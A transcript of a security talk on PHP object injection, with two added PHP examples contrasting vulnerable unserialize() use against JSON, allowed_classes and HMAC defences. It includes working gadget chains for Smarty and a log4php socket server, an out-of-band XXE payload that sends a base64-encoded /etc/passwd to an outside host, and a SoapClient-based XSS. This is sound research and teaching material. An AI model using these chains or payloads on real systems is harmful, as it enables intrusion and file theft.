PHP Object Injection Revisited
by Arseniy Reutov
28 May 2013

Transcript of PHP Object Injection Revisited

PHP Object Injection Revisited
me@raz0r.name, @ru_raz0r

$ whoami
Web application security researcher you have never heard of. Casual CTF player, random bug bounties participant, bla bla. PHP hater since 2006.

Agenda: boring stuff, some new stuff, some future stuff.

Deserialize bugs in 2013, you kiddin'?
Actually still alive, just remember Ruby and YAML (CVE-2013-0156, CVE-2013-0333).

What about PHP?
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution (CVE-2012-5692)
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection vulnerability (CVE-2013-1453)
CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection vulnerability (CVE-2013-1465)
All by Egidio Romano.
But... no new concepts since "Shocking news in PHP exploitation" by Stefan Esser (2009).

What is actually PHP Object Injection?

    class Foo {
        public $bar = "baz";
    }

serialize() turns an instance into a string:

    O:3:"Foo":1:{s:3:"bar";s:3:"baz";}

A vulnerable PHP web application takes that string from the client (a POST parameter, a cookie) and passes it to unserialize(), which rebuilds the object:

    object(Foo)#2 (1) {
      ["bar"]=>
      string(3) "baz"
    }

PHP magic methods
__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()

__destruct
Is called when the object is freed, i.e. on script termination at the latest. May contain dangerous code, and after unserialize() every property it touches is attacker-controlled.

CakePHP <= 1.3.5 / 1.2.8:

    function __destruct() {
        if ($this->__cache) {
            $core = App::core('cake');
            unset($this->__paths[rtrim($core[0], DS)]);
            Cache::write('dir_map', array_filter($this->__paths), '_cake_core_');
            Cache::write('file_map', array_filter($this->__map), '_cake_core_');
            Cache::write('object_map', $this->__objects, '_cake_core_');
        }
    }

Why only __destruct and web app's classes?

vBulletin 5
core
libraries
log4php
examples (no 403!)

log4php (http://logging.apache.org/log4php/) is used by CMS Made Simple, SugarCRM, vtiger, etc. It contains a handy "examples" dir. vBulletin just cloned the repo, leaving the examples in place, and did not protect it.

Examples:
appender_console.php
appender_dailyfile.php
appender_echo.php
appender_file.php
appender_mailevent.php
appender_mail.php
appender_mongodb.php
appender_null.php
appender_pdo.php
appender_php.php
appender_rollingfile.php
appender_socket.php
appender_socket_server.php
appender_syslog.php
cache.php
configurator_basic.php
configurator_php.php
configurator_xml.php
filter_denyall.php
filter_levelmatch.php
filter_levelrange.php
filter_stringmatch.php
layout_html.php
layout_pattern.php
layout_simple.php
layout_ttcc.php
layout_xml.php
mdc.php
ndc.php
renderer_default.php
renderer_map.php
simple.php

appender_socket_server.php listens on a TCP port and unserialize()s whatever arrives:

    $host = 'localhost';
    $port = 4242;
    $server = Net_Server::create('sequential', $host, $port);
    $handler = new Net_Server_Handler_Log();
    $server->setCallbackObject($handler);
    $server->start();

    class Net_Server_Handler_Log extends Net_Server_Handler {

        private $hierarchy;

        function onStart() {
            $this->hierarchy = Logger::getRootLogger();
        }

        function onReceiveData($clientId = 0, $data = "") {
            $events = $this->getEvents($data);
            foreach($events as $event) {
                $root = $this->hierarchy->getRootLogger();
                if($event->getLoggerName() === 'root') {
                    $root->callAppenders($event);
                } else {
                    $loggers = $this->hierarchy->getCurrentLoggers();
                    foreach($loggers as $logger) {
                        $root->callAppenders($event);
                        $appenders = $logger->getAllAppenders();
                        foreach($appenders as $appender) {
                            $appender->doAppend($event);
                        }
                    }
                }
            }
        }

        function getEvents($data) {
            if (preg_match('/^<log4php:event/', $data)) {
                throw new Exception("Please use 'log4php.appender.default.useXml = false' in appender_socket.properties file!");
            }
            preg_match('/^(O:\d+)/', $data, $parts);
            $events = split($parts[1], $data);
            array_shift($events);
            $size = count($events);
            for($i=0; $i<$size; $i++) {
                $events[$i] = unserialize($parts[1].$events[$i]);
            }
            return $events;
        }
    }

But here a method is called on the unserialized object ($event->getLoggerName()), and there are no useful magic methods in log4php. So what?

Let's use PHP classes instead!

The enumeration script from the slide, with the placeholder array filled in from the magic-method list above:

    $magic = array(
        '__construct', '__destruct', '__call', '__callStatic', '__get', '__set',
        '__isset', '__unset', '__sleep', '__wakeup', '__toString', '__invoke',
        '__set_state', '__clone',
    );
    $classes = get_declared_classes();
    foreach ($classes as $class) {
        $methods = get_class_methods($class);
        foreach ($methods as $method) {
            if (in_array($method, $magic)) {
                print $class . '::' . $method . "\n";
            }
        }
    }

Get all the magic methods!
Exception::__toString
ErrorException::__toString
DateTime::__wakeup
DOMException::__toString
LogicException::__toString
BadFunctionCallException::__toString
BadMethodCallException::__toString
DomainException::__toString
InvalidArgumentException::__toString
LengthException::__toString
OutOfRangeException::__toString
RuntimeException::__toString
OutOfBoundsException::__toString
OverflowException::__toString
RangeException::__toString
UnderflowException::__toString
UnexpectedValueException::__toString
CachingIterator::__toString
RecursiveCachingIterator::__toString
SplFileInfo::__toString
DirectoryIterator::__toString
FilesystemIterator::__toString
RecursiveDirectoryIterator::__toString
GlobIterator::__toString
SplFileObject::__toString
SplTempFileObject::__toString
ReflectionException::__toString
ReflectionFunctionAbstract::__toString
ReflectionFunction::__toString
ReflectionParameter::__toString
ReflectionMethod::__toString
ReflectionClass::__toString
ReflectionObject::__toString
ReflectionProperty::__toString
ReflectionExtension::__toString
PharException::__toString
Phar::__destruct
Phar::__toString
PharData::__destruct
PharData::__toString
PharFileInfo::__destruct
PharFileInfo::__toString
SimpleXMLElement::__toString
SimpleXMLIterator::__toString
SoapClient::__call
SoapFault::__toString
mysqli_sql_exception::__toString
PDOException::__toString
PDO::__wakeup
PDOStatement::__wakeup

__call() is triggered when invoking inaccessible methods in an object context. SoapClient::__call is exactly that: the getLoggerName() call in the socket server above lands in it.

SoapClient
public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )

Options:
location
uri
style
use
soap_version
login
password
proxy_host
proxy_port
proxy_login
proxy_password
local_cert
passphrase
authentication
compression
encoding
trace
classmap
exceptions
connection_timeout
typemap
type_name
type_ns
from_xml
cache_wsdl
user_agent
stream_context
features
keep_alive

WSDL mode: $wsdl = "http://somehost/api.wsdl" (WSDL = Web Services Description Language). Proper serialization is not implemented when SoapClient is initialized in WSDL mode :(

Non-WSDL mode: $wsdl = null. The object survives serialization :)

    new SoapClient(null, array('location' => 'http://raz0r.name/api.php',
                               'uri' => 'http://raz0r.name/'));

SOAP call to api.php:

    $event = new SoapClient(null, array('location' => 'http://raz0r.name/api.php', 'uri' => 'http://raz0r.name/'));
    $event->getLoggerName();

api.php on the attacker's host:

    <?php

    header("HTTP/1.0 404 <script>alert(1);</script>");

Result on the victim:

    Fatal error: Uncaught SoapFault exception: [HTTP] <script>alert(1);</script> in appender_socket_server.php:71

XSS: SoapClient generates a SoapFault exception and does not filter anything.

open_basedir bypass: SoapClient can cache WSDL files locally.

    ini_set('open_basedir', '/var/www/site/');
    ini_set('soap.wsdl_cache_enabled', true);
    ini_set('soap.wsdl_cache_dir', '/var/www/');
    $c = new SoapClient('http://raz0r.name/test.wsdl', array('cache_wsdl' => WSDL_CACHE_DISK));

    -rw------- 1 www-data www-data 530 2013-04-17 13:55 wsdl-raz0r-c7c3f5871a779534f433fa6fa878b92c

open_basedir restriction in effect? Nope!

XXE (kudos to Alexey Osipov and Timur Yunusov from Positive Technologies)

    $c = new SoapClient(null, array('uri'=>'http://raz0r.name/', 'location'=>'http://raz0r.name/xxe.xml'));
    $c->getLoggerName();

xxe.xml:

    <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:////etc/passwd">]>

Result:

    Fatal error: Uncaught SoapFault exception: [Client] DTD are not supported by SOAP

But if we use the out-of-band technique...

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
    <!ENTITY % a SYSTEM "http://bugsand.hol.es/3_deep?php://filter/read=convert.base64-encode/resource=/etc/passwd">
    %a;
    %intern;
    %trick;
    ]>

Request received on the attacker's server (the query string carrying the base64-encoded file is elided here):

    GET /result?…
    Host: bugsand.hol.es
    Connection: close

Decoded:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
    landscape:x:103:108::/var/lib/landscape:/bin/false

Smarty!

Smarty_Internal_Template:

    public function __destruct()
    {
        if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
            $this->cached->handler->releaseLock($this->smarty, $this->cached);
        }
    }

releaseLock() is called on whatever object sits in $this->cached->handler. Put a non-WSDL SoapClient there and the call goes through SoapClient::__call:

    class Smarty {
        public $cache_locking = true;
    }

    class Smarty_Template_Cached {
        public $is_locked = true;

        public function __construct() {
            $this->handler = new SoapClient(null, array(
                'uri' =>'http://raz0r.name/',
                'location' =>'http://raz0r.name/xxe.xml')
            );
        }
    }

    class Smarty_Internal_Template {
        public function __construct() {
            $this->smarty = new Smarty();
            $this->cached = new Smarty_Template_Cached();
        }
    }

    $c = serialize(new Smarty_Internal_Template());

XXE will be triggered automagically!

Some future stuff: what if a PHP framework is implemented as a PHP extension?

Phalcon is a web framework implemented as a C extension, offering high performance and lower resource consumption. The whole Phalcon class userspace is exposed to the users of shared hostings even if they do not use it. So we have unserialize(), the ability to init any class and execute arbitrary methods, and __wakeup():

Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString

The chain there: __wakeup -> fopen -> __toString()

So...
Do not unserialize user-supplied data!

Thanks! Questions?
Arseny Reutov
me@raz0r.name @ru_raz0r
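The SoapClient behaviour the talk relies on, shown in isolation as an added example (this code is not from the talk): a non-WSDL-mode instance round-trips through serialize()/unserialize() with its options intact, and any undefined method call on the result goes through __call() and becomes an HTTP request to 'location'. It needs ext/soap. The location (an unroutable port on localhost) and the uri are placeholders chosen so the request fails quickly instead of reaching anything.

```php
<?php
// Added example, not from the talk. Demonstrates the two SoapClient properties
// used by the Smarty and log4php chains in the slides:
//  (1) built with $wsdl = null, the object survives serialize()/unserialize();
//  (2) calling a method SoapClient does not define runs SoapClient::__call(),
//      which sends a SOAP POST to the 'location' option.
// Placeholder endpoints: 127.0.0.1:9 is the discard port, so nothing answers.

function build_soap_gadget(string $location, string $uri): string {
    $c = new SoapClient(null, array(
        'location' => $location,   // where __call() will send the request
        'uri'      => $uri,        // target namespace, mandatory in non-WSDL mode
    ));
    return serialize($c);          // works only because no WSDL was loaded
}

// Emulates the vulnerable consumer: unserialize attacker data, then call some
// method on the result (the log4php server calls getLoggerName(); Smarty's
// __destruct calls releaseLock()). The method name does not matter.
function trigger_soap_gadget(string $payload): string {
    $obj = unserialize($payload);
    if (!$obj instanceof SoapClient) {
        return 'object did not survive unserialize()';
    }
    try {
        $obj->getLoggerName();     // undefined -> SoapClient::__call() -> HTTP request
        return 'call returned without a fault';
    } catch (SoapFault $e) {
        // Against an unreachable location this is a connection failure.
        // Against an attacker-controlled one, the HTTP status line and body
        // are copied into the fault message unescaped (the XSS in the slides).
        return 'SoapFault: ' . $e->getMessage();
    }
}

$payload = build_soap_gadget('http://127.0.0.1:9/', 'http://example.invalid/');
echo $payload, "\n";                         // location and uri are visible as plain strings
echo trigger_soap_gadget($payload), "\n";
```

The serialized string is what an attacker embeds as a property value inside some application class whose __destruct, __wakeup or __toString ends up calling a method on it; the echo of $payload shows that nothing about it depends on the victim having ever used SOAP.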
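The closing advice in working code, as an added example that is not part of the talk. The FileCache class is hypothetical and stands in for the CakePHP-style __destruct gadget from the earlier slide; the loader functions put the vulnerable unserialize() call next to three fixes: a data-only format, unserialize() with allowed_classes => false (available from PHP 7.0), and an HMAC over the blob so that only data the application produced itself is ever unserialized. Function names, the key and the temp-file path are illustrative.

```php
<?php
// Added example, not from the talk. Part 1: a minimal object injection through a
// hypothetical __destruct gadget. Part 2: closing the hole at the trust boundary.

class FileCache {
    public $path = null;
    public $data = '';

    public function __destruct() {
        // Reads as "flush the cache on shutdown" inside the application.
        // After unserialize() both properties are whatever the client sent.
        if ($this->path !== null) {
            file_put_contents($this->path, $this->data);
        }
    }
}

// Attacker side. The gadget class only has to be declared (or autoloadable)
// in the process that runs unserialize(); the app need not use it at all.
function build_payload(string $target, string $content): string {
    $o = new FileCache();
    $o->path = $target;
    $o->data = $content;
    return serialize($o);
}

// 0. The vulnerable pattern: unserialize() on client-controlled bytes.
function load_state_vulnerable(string $untrusted) {
    return unserialize($untrusted);   // FileCache::__destruct runs when the result is freed
}

// 1. Use a data-only format: json_decode() never instantiates application classes.
function load_state_json(string $untrusted): ?array {
    $v = json_decode($untrusted, true);
    return is_array($v) ? $v : null;
}

// 2. If the serialize() format cannot be replaced, forbid objects (PHP >= 7.0).
//    Every O:/C: token then yields __PHP_Incomplete_Class and no magic method runs;
//    reject such results outright instead of passing them on.
function load_state_no_objects(string $untrusted) {
    $v = @unserialize($untrusted, array('allowed_classes' => false));
    if ($v === false && $untrusted !== 'b:0;') {
        return null;                  // malformed input
    }
    return contains_incomplete_class($v) ? null : $v;
}

function contains_incomplete_class($v): bool {
    if ($v instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($v)) {
        foreach ($v as $item) {
            if (contains_incomplete_class($item)) {
                return true;
            }
        }
    }
    return false;
}

// 3. Authenticate the blob: only strings the application sealed with its own key
//    reach unserialize(). hash_equals() keeps the comparison constant-time.
function seal(string $serialized, string $key): string {
    return hash_hmac('sha256', $serialized, $key) . ':' . $serialized;
}

function unseal(string $sealed, string $key) {
    $parts = explode(':', $sealed, 2);
    if (count($parts) !== 2) {
        return null;
    }
    list($mac, $serialized) = $parts;
    if (!hash_equals(hash_hmac('sha256', $serialized, $key), $mac)) {
        return null;                  // forged or tampered: never unserialized
    }
    return unserialize($serialized);
}

// Demo run: the destructor fires only on the vulnerable path.
$target  = sys_get_temp_dir() . '/poi_demo_' . getmypid() . '.txt';
$payload = build_payload($target, "written by FileCache::__destruct\n");
echo $payload, "\n";

load_state_vulnerable($payload);      // return value discarded, so __destruct runs here
echo 'vulnerable path: ', file_exists($target) ? 'file written' : 'nothing written', "\n";
@unlink($target);

var_dump(load_state_no_objects($payload));    // object token rejected
var_dump(unseal($payload, 'server-secret'));  // no valid MAC, rejected
var_dump(load_state_json($payload));          // not JSON, rejected
echo 'hardened paths: ', file_exists($target) ? 'file written' : 'nothing written', "\n";
```

Of the three, only the JSON route removes the class of bug entirely; allowed_classes stops gadget chains but still parses attacker-controlled structure, and the HMAC route is only as good as the secrecy of the key and the absence of any other unserialize() sink reachable with unsealed input.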